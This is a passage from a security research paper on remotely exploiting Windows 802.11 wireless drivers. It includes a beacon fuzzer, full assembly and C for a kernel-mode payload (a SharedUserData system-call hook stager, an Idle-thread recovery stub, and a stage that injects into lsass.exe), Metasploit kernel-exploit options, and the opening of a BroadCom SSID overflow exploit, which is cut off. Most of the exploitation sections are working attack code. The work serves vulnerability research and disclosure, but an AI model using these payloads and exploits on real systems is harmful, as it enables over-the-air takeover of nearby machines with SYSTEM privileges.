There are a number of standard C runtime artifacts that can still be used, but their use in device driver code stands out like a sore thumb. This fact hasn't stopped developers from using dangerous string functions. While the API being completely different is surely a big hurdle, there are a number of other gotchas that a user-mode programmer wouldn't normally find themselves worrying about. One of the most interesting limitations imposed upon device driver developers is the conservation of stack space. On modern derivatives of NT, kernel-mode threads are only provided with 3 pages (12288 bytes) of stack space. In user-mode, thread stacks will generally grow as large as 256KB (this default limit is controlled by the optional header of an executable binary). Due to the limited amount of kernel-mode thread stack space, it should be rare to ever see a device driver consuming a large amount of space within a stack frame. Nevertheless, it was observed that the Intel Centrino drivers have multiple instances of functions that consume over 1 page of stack space. That's 33% of the available stack space wasted within one stack frame!

Perhaps the most important of all of the differences is the extra care that must be taken when it comes to dealing with things like performance, error handling, and re-entrancy. These major elements are critical to ensuring the stability of the operating system as a whole. If a programmer is negligent in their handling of any of these things in user-mode, the worst that will happen is the application will crash. In kernel-mode, however, a failure to properly account for any of these elements will generally affect the stability of the system as a whole. Even worse, security-related flaws in device drivers provide a point of exposure that can result in super-user privileges.

From this very brief introduction, it is hoped that the reader will begin to realize that device driver development is a different world. It's a world that's filled with a greater number of restrictions and problems, where the implications of software bugs are much greater than one would normally see in user-mode. It's a world that hasn't yet received adequate attention in the form of exploit prevention technology, thus making it possible to improve and refine kernel-mode exploitation techniques. It should come as no surprise that such a world would be attractive to researchers and tinkerers alike. This very attraction is, in fact, one of the major motivations for this paper. While the authors will focus strictly on the process used to identify and exploit flaws in wireless device drivers, it should be noted that other device drivers are equally likely to be prone to security issues. However, most other device drivers don't have the distinction of exposing a connectionless layer 2 attack surface to all devices in close proximity. Frankly, it's hard to get much cooler than that. That only happens in the movies, right?

To kick things off, the structure of this paper is as follows. In chapter 3, the steps used to find vulnerabilities in wireless device drivers, such as through the use of fuzzing, are described. Chapter 4 explains the process of actually leveraging a device driver vulnerability to execute arbitrary code and how the 3.0 version of the Metasploit Framework has been extended to make this trivial to deal with. Finally, chapter 5 provides three real world examples of wireless device driver vulnerabilities.
Each real world example describes the trials and tribulations of the vulnerability, starting with the initial discovery and ending with arbitrary code execution.

3) Pre-Exploitation

This chapter describes the tools and strategies used by the authors to identify 802.11 wireless device driver vulnerabilities. Section 3.1 provides a basic description of the 802.11 protocol in order to provide the reader with information necessary to understand the attack surface that is exposed by 802.11 device drivers. Section 3.2 describes the basic interface exposed by the 3.0 version of the Metasploit Framework that makes it possible to craft arbitrary 802.11 packets. Finally, section 3.3 describes a basic approach to fuzzing certain aspects of the way a device driver handles certain 802.11 protocol functions.

3.1) Attack Surface

Device drivers suffer from the same types of vulnerabilities that apply to any other code written in the C programming language. Buffer mismanagement, faulty pointer math, and integer overflows can all lead to exploitable conditions. Device driver flaws are often seen as a low risk issue due to the fact that most drivers do not process attacker-controlled data. The exception, of course, are drivers for networking devices. Although Ethernet devices (and their drivers) have been around forever, the simplicity of what the driver has to handle has greatly limited the attack surface. Wireless drivers are required to handle a wider range of requests and are also required to expose this functionality to anyone within range of the wireless device. In the world of 802.11 device drivers, the attack surface changes based on the state of the device. The three primary states are:

1. Unauthenticated and Unassociated
2. Authenticated and Unassociated
3. Authenticated and Associated

In the first state, the client is not connected to a specific wireless network. This is the default state for 802.11 drivers and will be the focus for this section. The 802.11 protocol defines three different types of frames: Control, Management, and Data. These frame types are further divided into three classes (1, 2, and 3). Only frames in the first class are processed in the Unauthenticated and Unassociated state. The following 802.11 management sub-types are processed by clients while in state 1[3]:

1. Probe Request
2. Probe Response
3. Beacon
4. Authentication

The Probe Response and Beacon sub-types are used by wireless devices to discover and advertise the local wireless networks. Clients can transmit Probe Requests to discover networks as well (more below). The Authentication sub-type is used to join a specific wireless network and reach the second state. Wireless clients discover the list of available networks in two different ways. In Active Mode, the client will send a Probe Request containing an empty SSID field. Any access point in range will reply with a Probe Response containing the parameters of the wireless network it serves. Alternatively, the client can specify the SSID it is looking for. In Passive Mode, clients will listen for Beacon frames and read the network parameters from within the beacon. Since both of these methods result in a frame that contains wireless network information, it makes sense for the frame format to be similar. The method chosen by the client is determined by the capabilities of the device and the application using the driver.
A beacon frame includes a generic 802.11 header that defines the packet type, source, destination, Basic Service Set ID (BSSID) and other envelope information. Beacons also include a fixed-length header that is composed of a timestamp, beacon interval, and a capabilities field. The fixed-length header is followed by one or more Information Elements (IEs) which are variable-length fields and contain the bulk of the access point information. A probe response frame is almost identical to a beacon frame except that the destination address is set to that of the client whereas beacons set it to the broadcast address. Information elements consist of an 8-bit type field, an 8-bit length field, and up to 255 bytes of data. This type of structure is very similar to the common Type-Length-Value (TLV) form used in many different protocols. Beacon and probe response packets must contain an SSID IE, a Supported Rates IE, and a Channel IE for most wireless clients to process the packet. The 802.11 specification states that the SSID field (the human name for a given wireless network) should be no more than 32 bytes long. However, the maximum length of an information element is 255 bytes long. This leaves quite a bit of room for error in a poorly-written wireless driver. Wireless drivers support a large number of different information element types. The standard even includes support for proprietary, vendor-specific IEs.

3.2) Packet Injection

In order to attack a driver's beacon and probe response processing code, a method of sending raw 802.11 frames to the device is needed. Although the ability to send raw 802.11 packets is not a supported feature in most wireless cards, many open-source drivers can be convinced to integrate support with a small patch. A few even support it natively. Under the Linux operating system, there is a wide range of hardware and drivers that support raw packet injection. Unfortunately, each driver provides a slightly different interface for accessing this feature. To support many different wireless cards, a hardware-independent method for sending raw 802.11 frames is needed. The solution is the LORCON library (Loss of Radio Connectivity), written by Mike Kershaw and Joshua Wright. This library provides a standardized interface for sending raw 802.11 packets through a variety of supported drivers. However, this library is written in C and does not expose any Ruby bindings by default. To make it possible to interact with this library from Ruby, a new Ruby extension (ruby-lorcon) was created that interfaces with the LORCON library and exposes a simple object-oriented interface. This wrapper interface makes it possible to send arbitrary wireless packets from a Ruby script.

The easiest way to call the ruby-lorcon interface from a Metasploit module is through a mixin. Mixins are used in the 3.0 version of the Metasploit Framework to improve code reuse and allow any module to import a rich feature set simply by including the right mixins. The mixin that exists for LORCON provides three new user options and a simple API for opening the interface, sending packets, and changing the channel.
+-----------+----------+----------+--------------------------------------------+
| Name      | Default  | Required | Description                                |
+-----------+----------+----------+--------------------------------------------+
| CHANNEL   | 11       | yes      | The default channel number                 |
| DRIVER    | madwifi  | yes      | The name of the wireless driver for lorcon |
| INTERFACE | ath0     | yes      | The name of the wireless interface         |
+-----------+----------+----------+--------------------------------------------+

A Metasploit module that wants to send raw 802.11 packets should include the Msf::Exploit::Lorcon mixin. When this mixin is used, a module can make use of wifi.open() to open the interface and wifi.write() to send packets. The user will specify the INTERFACE and DRIVER options for their particular hardware and driver. The creation of the 802.11 packet itself is left in the hands of the module developer.

3.3) Vulnerability Discovery

One of the fastest ways to find new flaws is through the use of a fuzzer. In general terms, a fuzzer is a program that forces an application to process highly variant data that is typically malformed in the hopes that one of the attempts will yield a crash. Fuzzing a wireless device driver depends on the device being in a state where specific frames are processed and a tool that can send frames likely to cause a crash. In the first part of this chapter, the authors described the default state of a wireless client and what types of management frames are processed in this state. The two types of frames that this paper will focus on are Beacons and Probe Responses. These frames have the following structure:

+------+----------------------+
| Size | Description          |
+------+----------------------+
| 1    | Frame Type           |
| 1    | Frame Flags          |
| 2    | Duration             |
| 6    | Destination          |
| 6    | Source               |
| 6    | BSSID                |
| 2    | Sequence             |
| 8    | Timestamp            |
| 2    | Beacon Interval      |
| 2    | Capability Flags     |
| Var  | Information Elements |
| 2    | Frame Checksum       |
+------+----------------------+

The Information Elements field is a list of variable-length structures consisting of a one byte type field, a one byte length field, and up to 255 bytes of data. Variable-length fields are usually good targets for fuzzing since they require special processing when the packet is parsed. To attack a driver that uses Passive Mode to discover wireless networks, it's necessary to flood the target with mangled Beacons. To attack a driver that uses Active Mode, it's necessary to flood the target with mangled Probe Responses while forcing it to scan for networks. The following Ruby code generates a Beacon frame with randomized Information Element data. The Frame Checksum field is automatically added by the driver and does not need to be included.
#
# Generate a beacon frame with random information elements
#

# Maximum frame size (max is really 2312)
mtu = 1500

# Number of information elements
ies = rand(1024)

# Randomized SSID
ssid = Rex::Text.rand_text_alpha(rand(31)+1)

# Randomized BSSID
bssid = Rex::Text.rand_text(6)

# Randomized source
src = Rex::Text.rand_text(6)

# Randomized sequence
seq = [rand(255)].pack('n')

# Capabilities
cap = Rex::Text.rand_text(2)

# Timestamp
tstamp = Rex::Text.rand_text(8)

# Note: 'channel' is supplied by the module's CHANNEL option
frame =
    "\x80" +                         # type/subtype (mgmt/beacon)
    "\x00" +                         # flags
    "\x00\x00" +                     # duration
    "\xff\xff\xff\xff\xff\xff" +     # dst (broadcast)
    src +                            # src
    bssid +                          # bssid
    seq +                            # seq
    tstamp +                         # timestamp value
    "\x64\x00" +                     # beacon interval
    cap +                            # capabilities

    # First IE: SSID
    "\x00" + ssid.length.chr + ssid +

    # Second IE: Supported Rates
    "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +

    # Third IE: Current Channel
    "\x03" + "\x01" + channel.chr

# Generate random Information Elements and append them
1.upto(ies) do |i|
    max = mtu - frame.length
    break if max < 2
    t = rand(256)
    l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1)
    d = Rex::Text.rand_text(l)
    frame += t.chr + l.chr + d
end

While this is just one example of a simple 802.11 fuzzer for a particular frame, much more complicated, state-aware fuzzers could be implemented that make it possible to fuzz other packet handling areas of wireless device drivers.

4) Exploitation

After an issue has been identified through the use of a fuzzer or through manual analysis, it's necessary to begin the process of determining a way to reliably gain control of the instruction pointer. In the case of stack-based buffer overflows on Windows, this process is often as simple as determining the offset to the return address and then overwriting it with the address of an instruction that jumps back into the stack. That's the best case scenario, though, and there are often other hurdles to overcome regardless of whether the vulnerability exists in a device driver or in a user-mode program. These hurdles and other factors are what tend to make the process of getting reliable control of the instruction pointer one of the most challenging steps in exploit development. Rather than exhaustively describing all of the problems one could run into, the authors will instead provide illustrations in the form of the real world examples included in chapter 5.

Assuming reliable control of the instruction pointer can be gained, the development of an exploit typically transitions into its final stage: arbitrary code execution. In user-mode, this stage has been completely automated for most exploit developers. It's become common practice to simply use Metasploit's user-mode payload generator. Kernel-mode payloads, on the other hand, have not seen an integrated solution for producing reliable payloads that can be dropped into any exploit. That's certainly not to say that there hasn't been previous work dealing with kernel-mode payloads, as there definitely has been[2,1], but their form up to now has been one that is not particularly easy to adopt. This lack of easy-to-use kernel-mode payloads can be seen as one of the major reasons why there has not been a large number of public, reliable kernel-mode exploits.
Since one of the goals of this paper is to illustrate how kernel-mode exploits can be written just as easily as user-mode exploits, the authors determined that it was necessary to incorporate the existing set of kernel-mode payload ideas into the 3.0 version of the Metasploit Framework, where they could be used freely with any future kernel-mode exploits. While this final integration was certainly the end-goal, there were a number of important steps that had to be taken before the integration could occur. The following sections will attempt to provide this background. In section 4.1, details regarding the payload architecture that the authors selected are described. This section also includes a description of the interface that has been exposed in the 3.0 version of the Metasploit Framework for developers who wish to implement kernel-mode exploits.

4.1) Payload Architecture

The payload architecture that the authors decided to integrate was based heavily on previous research[1]. As was alluded to in the introduction, there are a number of complicated considerations that must be taken into account when dealing with kernel-mode exploitation. A large majority of these considerations are directly related to what methods should be used when executing arbitrary code in the kernel. For example, if a device driver was holding a lock at the time that an exploit was triggered, what might be the best way to go about releasing that lock so as to recover the system, so that it will still be possible to interact with it in a meaningful way? Other types of considerations include things like IRQL restrictions, cleaning up corrupted structures, and so on. These considerations lead to there being many different ways in which a payload might best be implemented for a particular vulnerability. This is quite a bit different from the user-mode environment, where it's almost always possible to use the exact same payload regardless of the application.

Though these situational complications do exist, it is possible to design and implement a payload system that can be applied in almost any circumstance. By separating kernel-mode payloads into variable components, it becomes possible to combine components together in different ways to form functional variations that are best suited for particular situations. In Windows Kernel-mode Payload Fundamentals [1], kernel-mode payloads are broken down into four different components: migration, stagers, recovery, and stages. When describing kernel-mode payloads in terms of components, the migration component would be one that is used to migrate from an unsafe execution environment to a safe execution environment. For example, if the IRQL is at DISPATCH when a vulnerability is triggered, it may be necessary to migrate to a safer IRQL such as PASSIVE. It is not always necessary to have a migration component. The purpose of a stager component is to move some portion of the payload so that it executes in the context of another thread. This may be necessary if the current thread is of critical importance or may lead to a deadlock of the system should certain operations be used. The use of a stager may obviate the need for a migration component. A recovery component is something that is used to restore the system to a clean state and then continue execution. This component is generally one that may require customization for a given vulnerability, as it may not always be possible to describe the steps needed to recover the system in a generic way.
For example, if locks were held at the time that the vulnerability was triggered, it may be necessary to find a way to release those locks and then continue execution from a safe point. Finally, the stage component is a catch-all for whatever arbitrary code may be executed once the payload is running in a safe environment.

This model for describing kernel-mode payloads is what the authors decided to adopt. To better understand how this model works, it seems best to describe how it was applied for all three real world vulnerabilities that are shown in chapter 5. These three vulnerabilities actually make use of the same basic underlying payload, which will henceforth be referred to as "the payload" for brevity. The payload itself is composed of three of the four components. Each of the payload components will be discussed individually and then as a whole to provide an idea for how the payload operates.

The first component that exists in the payload is a stager component. The stager that the authors chose to use is based on the SharedUserData SystemCall Hook stager described in [1]. Before understanding how the stager works, it's important to understand a few things. As the name implies, the stager accomplishes its goal by hooking the SystemCall attribute found within SharedUserData. As a point of reference, SharedUserData is a global page that is shared between user-mode and kernel-mode. It acts as a sort of global structure that contains things like tick count and time information, version information, and quite a few other things. It's extremely useful for a few different reasons, not the least of which being that it's located at a fixed address in user-mode and in kernel-mode on all NT derivatives. This means that the stager is instantly portable and doesn't need to perform any symbol resolution to locate the address, thus helping to keep the overall size of the payload small.

The SystemCall attribute that is hooked is part of an enhancement that was added in Windows XP. This enhancement was designed to make it possible to use optimized system call instructions depending on what hardware support is present on a given machine. Prior to Windows XP, system calls were dispatched from user-mode through the hardcoded use of the int 0x2e soft interrupt. Over time, hardware enhancements were made to decrease the overhead involved in performing a system call, such as through the introduction of the sysenter instruction. Since Microsoft isn't in the business of providing different versions of Windows for different makes and models of hardware, they decided to determine at runtime which system call interface to use. SharedUserData was the perfect candidate for storing the results of this runtime determination as it was already a shared page that existed in every user-mode process. After making these modifications, ntdll.dll was updated to dispatch system calls through SharedUserData rather than through the hardcoded use of int 0x2e. The initial implementation of this new system call dispatching interface placed executable code within the SystemCall attribute of SharedUserData. Subsequent versions of Windows, such as XP SP2, turned the SystemCall attribute into a function pointer.

One important implication about the introduction of the SystemCall attribute to SharedUserData is that it represents a pivot point through which all system call dispatching occurs in user-mode. In previous versions of Windows, each user-mode system call stub routine invoked int 0x2e directly.
In the latest versions, these stub routines make indirect calls through the SystemCall function pointer. By default, this function pointer is initialized to point to one of a few exported symbols within ntdll.dll. However, if this function pointer is changed to point elsewhere, it becomes possible to intercept all system calls within all processes. This implication is what forms the very foundation of the stager that is used by the payload.

When the stager begins executing, it's running in kernel-mode in the context of the thread that triggered the vulnerability. The first action it takes is to copy a chunk of code (the stage) into an unused portion of SharedUserData at the predictable address 0xffdf037c. After the copy operation completes, the stager proceeds by hooking the SystemCall attribute. This hook must be handled differently depending on whether the target operating system is pre-XP SP2. More details on how this can be handled are described in [1]. Regardless of the approach, the SystemCall attribute is redirected to point to 0x7ffe037c. This predictable location is the user-mode accessible address of the unused portion of SharedUserData into which the stage was copied. After the hooking operation completes, all system calls invoked by user-mode processes will first go through the stage placed at 0x7ffe037c. The stager portion of the payload looks something like this (note that this implementation is only designed to work on XP SP2 and Windows 2003 Server SP1; modifications would be needed to make it work on previous versions of XP and 2003):

; Jump/Call to get the address of the stage
00000000  EB38              jmp short 0x3a
00000002  BB0103DFFF        mov ebx,0xffdf0301
00000007  4B                dec ebx
00000008  FC                cld
; Copy the stage into 0xffdf037c
00000009  8D7B7C            lea edi,[ebx+0x7c]
0000000C  5E                pop esi
0000000D  6AXX              push byte num_stage_dwords
0000000F  59                pop ecx
00000010  F3A5              rep movsd
; Set edi to the address of the soon-to-be function pointer
00000012  BF7C03FE7F        mov edi,0x7ffe037c
; Check to make sure the hook hasn't already been installed
00000017  393B              cmp [ebx],edi
00000019  7409              jz 0x24
; Grab SystemCall function pointer
0000001B  8B03              mov eax,[ebx]
0000001D  8D4B08            lea ecx,[ebx+0x8]
; Store the existing value in 0x7ffe0308
00000020  8901              mov [ecx],eax
; Overwrite the existing function pointer and make things live!
00000022  893B              mov [ebx],edi
; recovery stub here
0000003A  E8C3FFFFFF        call 0x2
; stage here

With the hook in place, the stager has completed its primary task, which was to copy a stage into a location where it can be executed in the future. Before the stage can execute, the stager must allow the recovery component of the payload to execute.
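As an aside, for readers who find C easier to follow than assembly, the hooking logic above can be rendered roughly as follows. This is a sketch only, not the actual Metasploit implementation; the constants come straight from the disassembly and assume the XP SP2/2003 SP1 layout it targets.

#define SUD_KERNEL_BASE 0xffdf0000UL  /* kernel-mode alias of SharedUserData */
#define SUD_USER_BASE   0x7ffe0000UL  /* user-mode alias of the same page    */
#define SYSTEM_CALL_OFF 0x300         /* SystemCall function pointer         */
#define SAVED_PTR_OFF   0x308         /* where the original pointer is kept  */
#define STAGE_OFF       0x37c         /* unused scratch area for the stage   */

void install_syscall_hook(const unsigned char *stage, unsigned long stage_len)
{
    unsigned long *system_call = (unsigned long *)(SUD_KERNEL_BASE + SYSTEM_CALL_OFF);
    unsigned long *saved_ptr   = (unsigned long *)(SUD_KERNEL_BASE + SAVED_PTR_OFF);
    unsigned char *stage_dst   = (unsigned char *)(SUD_KERNEL_BASE + STAGE_OFF);
    unsigned long  user_stage  = SUD_USER_BASE + STAGE_OFF;
    unsigned long  i;

    /* Bail out if the hook has already been installed */
    if (*system_call == user_stage)
        return;

    /* Copy the stage into the unused portion of SharedUserData */
    for (i = 0; i < stage_len; i++)
        stage_dst[i] = stage[i];

    /* Preserve the original dispatcher at SharedUserData+0x308, then
       redirect all system calls through the user-mode alias of the stage */
    *saved_ptr   = *system_call;
    *system_call = user_stage;
}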
As mentioned previously, the recovery component represents one of the most vulnerability-specific portions of any kernel-mode payload. For the purpose of the exploits described in chapter 5, a special purpose recovery component was necessary. This particular recovery component was required because the example vulnerabilities are triggered in the context of the Idle thread. On Windows, the Idle thread is a special kernel thread that executes whenever a processor is idle. Due to the way the Idle thread operates, it's dangerous to perform operations like spinning the thread or any of the other recovery methods described in [1]. It may also be possible to apply the technique for delaying execution within the Idle thread as discussed in [2].

The recovery method that was finally selected involves two basic steps. First, the IRQL for the current processor is restored to DISPATCH level, just in case it was executing at a higher IRQL. Second, execution control is transferred to the first instruction of nt!KiIdleLoop after initializing registers appropriately. The end effect is that the Idle thread begins executing all over again and, if all goes well, the system continues operating as if nothing had happened. In practice, this recovery method has proven reliable. However, the one drawback it has is that it requires knowledge of the address at which nt!KiIdleLoop resides. This dependence represents an area that is ripe for future improvement. Regardless of its limitations, the recovery component for the payload looks like the code below:

; Restore the IRQL
00000024  31C0              xor eax,eax
00000026  64C6402402        mov byte [fs:eax+0x24],0x2
; Initialize assumed registers
0000002B  8B1D1CF0DFFF      mov ebx,[0xffdff01c]
00000031  B827BB4D80        mov eax,0x804dbb27
00000036  6A00              push byte +0x0
; Transfer control to nt!KiIdleLoop
00000038  FFE0              jmp eax

After the recovery component has completed its execution, all of the payload code that was originally executing in kernel-mode is complete. The final portion of the payload that remains to be executed is the stage that was copied by the stager. The stage itself runs in user-mode within all process contexts, and it executes every time a system call is dispatched. The implications of this should be obvious. Having a stage that executes within every process every time a system call occurs is just asking for trouble. For that reason, it makes sense to design a generic user-mode stage that limits its own execution to one particular context.

The approach that the authors took to meet this requirement is as follows. First, the stage performs a check that is designed to see if it is running in the context of a specific process. This check is there to help ensure that the stage itself only executes in a known-good environment. As an example, it would be a shame to take advantage of a kernel-mode vulnerability only to finally execute code with the privileges of Guest. By default, this check is designed to see if the stage is running within lsass.exe, a process that runs with SYSTEM level privileges. If the stage is running within lsass, it performs a check to see if the SpareBool attribute of the Process Environment Block has been set to one. By default, this value is initialized to zero in all processes. If the SpareBool attribute is set to zero, the stage proceeds to set it to one and then finishes by executing whatever code remains within the stage. If the SpareBool attribute is set to one, which means the stage has already run, or the stage is not running within lsass, it transfers control back to the original system call dispatching routine. This is necessary because system calls from user-mode processes must still be dispatched appropriately; otherwise the system itself would grind to a halt.
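To make the stage's control flow easier to digest before reading the assembly, the same decision logic can be modeled in C. This is a rough sketch, not the real stage: the offsets (Ldr at +0x0c, ProcessParameters at +0x10, ImagePathName.Buffer at +0x3c, SpareBool at +0x03) mirror the listing that follows, and name_matches_lsass is a hypothetical helper standing in for the packed dword comparison the assembly actually performs.

extern int name_matches_lsass(const unsigned char *utf16_path);

int stage_gate(unsigned char *peb) /* peb = the PEB, reached via fs:[0x30] */
{
    unsigned char *image_path;

    /* If Peb->Ldr is NULL, the process is still initializing; skip it */
    if (*(void **)(peb + 0x0c) == 0)
        return 0;

    /* Peb->ProcessParameters->ImagePathName.Buffer, skipping the first
       0x28 bytes ("c:\windows\system32\" in UTF-16) */
    image_path  = *(unsigned char **)(*(unsigned char **)(peb + 0x10) + 0x3c);
    image_path += 0x28;

    /* Hypothetical helper; the real stage folds the UTF-16 name into a
       single dword and compares it against 0x7373616c */
    if (!name_matches_lsass(image_path))
        return 0;

    /* Run-once flag: Peb->SpareBool at offset +0x03 */
    if (peb[0x03] == 1)
        return 0;

    peb[0x03] = 1;  /* mark as run so later system calls pass straight through */
    return 1;       /* safe to execute the payload, exactly once */
}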
An example of what this stage might look like is shown below:

; Preserve the calling environment
0000003F  60                pusha
00000040  6A30              push byte +0x30
00000042  58                pop eax
00000043  99                cdq
00000044  648B18            mov ebx,[fs:eax]
; Check if Peb->Ldr is NULL
00000047  39530C            cmp [ebx+0xc],edx
0000004A  7426              jz 0x72
; Extract Peb->ProcessParameters->ImagePathName.Buffer
0000004C  8B5B10            mov ebx,[ebx+0x10]
0000004F  8B5B3C            mov ebx,[ebx+0x3c]
; Add 0x28 to the image path name (skip past c:\windows\system32\)
00000052  83C328            add ebx,byte +0x28
; Compare the (folded) name of the executable with lsass
00000055  8B0B              mov ecx,[ebx]
00000057  034B03            add ecx,[ebx+0x3]
0000005A  81F96C617373      cmp ecx,0x7373616c
; If it doesn't match, execute the original system call dispatcher
00000060  7510              jnz 0x72
00000062  648B18            mov ebx,[fs:eax]
00000065  43                inc ebx
00000066  43                inc ebx
00000067  43                inc ebx
; Check if Peb->SpareBool is 1; if it is, execute the original
; system call dispatcher
00000068  803B01            cmp byte [ebx],0x1
0000006B  7405              jz 0x72
; Set Peb->SpareBool to 1
0000006D  C60301            mov byte [ebx],0x1
; Jump into the continuation stage
00000070  EB07              jmp short 0x79
; Restore the calling environment and execute the original system call
; dispatcher that was preserved in 0x7ffe0308
00000072  61                popa
00000073  FF250803FE7F      jmp near [0x7ffe0308]
; continuation of the stage

The culmination of these three payload components is a functional payload that can be used in any situation where an exploit is triggered within the Idle thread. If the exploit is triggered outside of the context of the Idle thread, the recovery component can be swapped out for an alternative method and the rest of the payload can remain unchanged. This is one of the benefits of breaking kernel-mode payloads down into different components.

To recap, the payload works by using a stager to copy a stage into an unused portion of SharedUserData. The stager then points the SystemCall attribute to that unused portion, effectively causing all user-mode processes to bounce through the stage when they attempt to make a system call. Once the stager has completed, the recovery component restores the IRQL to DISPATCH and then restarts the Idle thread. The kernel-mode portion of the payload is then complete. Shortly after that, the stage that was copied to SharedUserData is executed in the context of a specific user-mode process, such as lsass.exe. Once this occurs, the stage sets a flag indicating that it has been executed and completes. All told, the payload itself is only 115 bytes, excluding any additional code in the stage.

Given all of this infrastructure work, it's trivial to plug almost any user-mode payload into the stage. The additional code must simply be placed at the point where it has been verified that the stage is running in a particular process and that it hasn't been executed before. This triviality was quite intentional. One of the major goals in implementing this payload system was to make it possible to use the existing set of payloads in the Metasploit Framework in conjunction with any kernel-mode exploit. This includes even some of the more powerful payloads, such as Meterpreter and VNC injection.

There were two key elements involved in integrating kernel-mode payloads into the 3.0 version of the Metasploit Framework. The first had to do with defining the interface that exploit developers would need to use when writing kernel-mode exploits. The second dealt with defining the interface that end-users would have to be aware of when using kernel-mode exploits.
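Before turning to those interfaces, it is worth noting what the framework has to do mechanically: combining the components is mostly a matter of concatenating byte arrays and patching a couple of immediates. The sketch below illustrates the idea; the offsets are taken from the listings above (the operand of the push byte num_stage_dwords and of the mov eax carrying the nt!KiIdleLoop address) and should be treated as illustrative, since the real framework computes them per component.

#include <string.h>

#define NUM_DWORDS_OFF 0x0e  /* immediate of "push byte num_stage_dwords" */
#define KIIDLELOOP_OFF 0x32  /* immediate of "mov eax, nt!KiIdleLoop"     */

/* Glue the kernel-mode blob (stager + recovery) and the user-mode stage
   together, returning the total length of the finished payload. */
unsigned long build_payload(unsigned char *out,
                            const unsigned char *kernel_blob,
                            unsigned long kernel_len,
                            const unsigned char *stage,
                            unsigned long stage_len,
                            unsigned long ki_idle_loop)
{
    /* Kernel-mode components first, then the stage that the stager's
       rep movsd will copy into SharedUserData */
    memcpy(out, kernel_blob, kernel_len);
    memcpy(out + kernel_len, stage, stage_len);

    /* Patch the number of dwords the stager copies (rounded up) */
    out[NUM_DWORDS_OFF] = (unsigned char)((stage_len + 3) / 4);

    /* Patch the recovery component's nt!KiIdleLoop address (32-bit target) */
    memcpy(out + KIIDLELOOP_OFF, &ki_idle_loop, 4);

    return kernel_len + stage_len;
}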
In terms of precedence, defining the programming-level interfaces first is the ideal approach. To that point, the programming interface that was decided upon should be pretty easy to use. The majority of the complexity involved in selecting a kernel-mode payload is hidden from the developer. There are only a few basic things that the developer needs to be aware of.

When implementing a kernel-mode exploit in Metasploit 3.0, it is necessary to include the Msf::Exploit::KernelMode mixin. This mixin provides hints to the framework that make it aware of the fact that any payloads used with this exploit will need to be appropriately encapsulated within a kernel-mode stager. With this simple action, the majority of the work associated with the kernel-mode payload is abstracted away from the developer. The only other element that a developer may need to deal with is the process of defining extended parameters that further control the selection of different aspects of the kernel-mode payload. These controllable parameters are exposed to developers through the ExtendedOptions hash element in an exploit's global or target-specific Payload options. An example of what this might look like within an exploit can be seen here:

'Payload' =>
  {
    'ExtendedOptions' =>
      {
        'Stager'            => 'sud_syscall_hook',
        'Recovery'          => 'idlethread_restart',
        'KiIdleLoopAddress' => 0x804dbb27,
      }
  }

In the above example, the exploit has explicitly selected the underlying stager component that should be used by specifying the Stager hash element. The sud_syscall_hook stager is a symbolic name for the stager that was described in section 4.1. The example above also has the exploit explicitly selecting the recovery component that should be used. In this case, the recovery component that is selected is idlethread_restart, which is a symbolic name for the recovery component described previously. Additionally, the nt!KiIdleLoop address is specified for use with this particular recovery component.

Under the hood, the use of the KernelMode mixin and the additional extended options results in the framework encapsulating whatever user-mode payload the end-user specified inside of a kernel-mode stager. In the end, this process is entirely transparent to both the developer and the end-user. While the set of options that can be specified in the extended options hash will surely grow in the future, it makes sense to at least document the set of defined elements at the time of this writing. These options include:

Recovery: Defines the recovery component that should be used when generating the kernel-mode payload. The current set of valid values for this option includes spin, which will spin the current thread, idlethread_restart, which will restart the Idle thread, and default, which is equivalent to spin. Over time, more recovery methods may be added. These can be found in recovery.rb.

RecoveryStub: Defines a custom recovery component.

Stager: Defines the stager component that should be used when generating the kernel-mode payload. The current set of valid values for this option includes sud_syscall_hook. Over time, more stager methods may be added. These can be found in stager.rb.

UserModeStub: Defines the user-mode custom code that should be executed as part of the stage.

RunInWin32Process: Currently only applicable to the sud_syscall_hook stager. This element specifies the name of the system process, such as lsass.exe, that should be injected into.
KiIdleLoopAddress: Currently only applicable to the idlethread_restart recovery component. This element specifies the address of nt!KiIdleLoop.

While not particularly important to developers or end-users, it may be interesting for some to understand how this abstraction works internally. To start things off, the KernelMode mixin overrides a base class method called encode_begin. This method is called when a payload that is used by an exploit is being encoded. When this happens, the mixin registers a procedure that the payload encoder subsequently calls in the context of encapsulating the pre-encoded payload. The procedure is passed the original raw user-mode payload and the payload options hash (which contains the extended options, if any, that were specified in the exploit). It uses this information to construct the kernel-mode stager that encapsulates the user-mode payload. If the procedure completes successfully, it returns a non-nil buffer that contains the original user-mode payload encapsulated within a kernel-mode stager. The kernel-mode stager and other components are actually contained within the payloads subsystem of the Rex library under lib/rex/payloads/win32/kernel.

5) Case Studies

This chapter describes three separate vulnerabilities that were found by the authors in real world 802.11 wireless device drivers. These three issues were found through a combination of fuzzing and manual analysis.

5.1) BroadCom

The first vulnerability that was subject to the process described in this paper was an issue found in BroadCom's wireless device driver. This vulnerability was discovered by Chris Eagle as a result of his interest in doing some reversing of kernel-mode code. Chris noticed what appeared to be a conventional stack overflow in the way the BroadCom device driver handled beacon packets. As a result of this tip, a simple program was written that generated beacon packets with overly sized SSIDs. The code that was used to do this is shown below:

int main(int argc, char **argv)
{
    Packet_80211 BeaconPacket;

    CreatePacketForExploit(BeaconPacket, basic_target);

    printf("Looping forever, sending packets.\n");

    while(true)
    {
        int ret = Send80211Packet(&in_tx, BeaconPacket);

        usleep(cfg.usleep);

        if (ret == -1)
        {
            printf("Error tx'ing packet. Is interface up?\n");
            exit(0);
        }
    }
}

void CreatePacketForExploit(Packet_80211 &P, struct target T)
{
    Packet_80211_mgmt Beacon;
    u_int8_t bcast_addy[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};

    Packet_80211_mgmt_Crafter MgmtCrafter(bcast_addy, cfg.src, cfg.bssid);

    MgmtCrafter.craft(8, Beacon); // 8 = beacon

    P = Beacon;

    printf("\n");

    if (T.payload_size > 255)
    {
        printf("invalid target. payload sizes > 255 wont fit in a single IE\n");
        exit(0);
    }

    u_int8_t fixed_parameters[12] =
    {
        '_', ',', '.', 'j', 'c', '.', ',', '_', // timestamp (8 bytes)
        0x64, 0x00,                             // beacon interval: 100 TUs (102.4 ms)
        0x11, 0x04                              // capability information: ESS, WEP, short slot time
    };

    P.AppendData(sizeof(fixed_parameters), fixed_parameters);

    u_int8_t SSID_ie[257]; // 255 + 2 for type and length
    u_int8_t *SSID = SSID_ie + 2;

